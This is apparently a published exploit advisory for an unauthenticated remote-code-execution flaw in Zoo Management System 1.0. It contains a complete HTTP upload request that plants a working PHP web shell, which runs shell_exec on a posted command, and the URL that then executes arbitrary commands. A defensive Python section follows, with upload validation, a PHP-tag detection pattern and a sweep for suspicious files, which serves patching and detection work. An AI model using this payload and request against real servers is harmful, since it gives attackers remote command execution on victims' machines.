Zoo Management System 1.0 Unauthenticated RCE

2024.03.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11

## Unauthenticated users can reach the /zoomanagementsystem/admin/public_html/save_animal endpoint and upload a malicious PHP file in place of an animal picture, without any authentication.

POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="animal_id"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_given_name"

kdkd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_species_name"

ıdsıd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dob"

1552-02-05
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_gender"

m
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_avg_lifespan"

3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="class_id"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="location_id"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dietary_req"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_natural_habitat"

faad
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_pop_dist"

eterter
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_joindate"

5559-02-06
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_height"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_weight"

3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_description"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream

<?php
if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>
* { -webkit-box-sizing: border-box; box-sizing: border-box; }
body { font-family: sans-serif; color: rgba(0, 0, 0, .75); }
main { margin: auto; max-width: 850px; }
pre, input, button { padding: 10px; border-radius: 5px; background-color: #efefef; }
label { display: block; }
input { width: 100%; background-color: #efefef; border: 2px solid transparent; }
input:focus { outline: none; background: transparent; border: 2px solid #e6e6e6; }
button { border: none; cursor: pointer; margin-left: 5px; }
button:hover { background-color: #e6e6e6; }
.form-group { display: -webkit-box; display: -ms-flexbox; display: flex; padding: 15px 0; }
</style>
</head>
<body>
<main>
<h1>Web Shell</h1>
<h2>Execute a command</h2>
<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
<button type="submit">Execute</button>
</div>
</form>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<h2>Output</h2>
<?php if (isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
<?php endif; ?>
</main>
</body>
</html>
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_med_record"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer_reason"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_date"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_cause"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_incineration"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_gest_period"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_category"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_avg_body_temp"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_nest_const"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_clutch_size"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_wingspan"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_color_variant"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_body_temp"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_water_type"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_color_variant"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="rep_type"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="clutch_size"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="num_offspring"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="submit"


------WebKitFormBoundary8NY8zT5dXIloiUML--

## After the POST request is sent by an attacker, the uploaded file can be found under http://localhost/zoomanagementsystem/img/animals/, and the attacker can execute arbitrary commands through http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.
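The weakness described above comes down to two missing controls: the save_animal endpoint does not require a logged-in session, and the animal-picture field stores whatever file it receives under a name derived from the client-supplied one (ultra.php becomes ultra_1697442648.php in a web-served directory). The Python below is an added example, not code from the advisory or from Zoo Management System. The image allow-list, magic-byte table, script-extension list, function names and the sample files are this example's own assumptions; only the img/animals/ layout and the timestamped naming come from the advisory. It shows the content checks a fixed upload handler needs (extension allow-list, leading bytes that match the extension, no embedded PHP open tag, a server-chosen file name) and a sweep an operator can run over an existing install's upload directory to list files that are not real images.

```python
import os
import re
import secrets
import tempfile

# Allow-list of image extensions the animal-picture field should accept
# (assumed for this example).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Extensions that must never sit in a web-served upload directory
# (assumed list; extend it for the server's actual handler configuration).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "htaccess"}

# Leading bytes of the accepted image formats (assumed table for this example).
MAGIC = (
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)

# A PHP open tag anywhere in the body marks a polyglot even when the magic is right.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def sniff_image_type(data):
    """Return the image type implied by the first bytes, or None."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return None


def validate_upload(filename, data):
    """Decide whether a submitted file may be stored as an animal picture.

    Returns (accepted, reason). Both the client-supplied name and the content
    are checked, so renaming a script to .jpg is not enough to pass.
    """
    base = os.path.basename(filename.replace("\\", "/"))  # drop any path part
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False, "extension not allowed: " + ext
    kind = sniff_image_type(data)
    if kind is None:
        return False, "content is not an image"
    if kind != ("jpg" if ext == "jpeg" else ext):
        return False, "extension/content mismatch"
    if PHP_TAG.search(data):
        return False, "php tag embedded in image"
    return True, "ok"


def storage_name(kind):
    """Server-chosen file name: random, fixed extension, never the client's."""
    return secrets.token_hex(16) + "." + kind


def find_suspicious_uploads(directory):
    """Sweep an upload directory and list files that are script files or whose
    content is not a recognised image (the check an operator runs after a fix)."""
    hits = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        ext = name.rsplit(".", 1)[1].lower() if "." in name else ""
        with open(path, "rb") as fh:
            head = fh.read(16)
        if ext in SCRIPT_EXTENSIONS or sniff_image_type(head) is None:
            hits.append(name)
    return hits


def build_sample_upload_dir():
    """Constructed stand-in for img/animals/: one real JPEG, one script using
    the timestamped name pattern from the advisory, one script hidden as .jpg."""
    directory = tempfile.mkdtemp(prefix="animals_")
    samples = {
        "lion_1697442000.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 28,
        "ultra_1697442648.php": b"<?php echo 'x'; ?>",
        "cover.jpg": b"<?php echo 'x'; ?>",
    }
    for name, body in samples.items():
        with open(os.path.join(directory, name), "wb") as fh:
            fh.write(body)
    return directory


if __name__ == "__main__":
    print(validate_upload("ultra.php", b"<?php echo 'x'; ?>"))
    print(validate_upload("lion.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 28))
    print(find_suspicious_uploads(build_sample_upload_dir()))
```

The content checks belong after an authentication check on the endpoint itself, which this snippet does not model; and even with both in place, the upload directory should be served with script execution disabled so that a future bypass yields a download rather than code execution.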

Copyright 2024, cxsecurity.com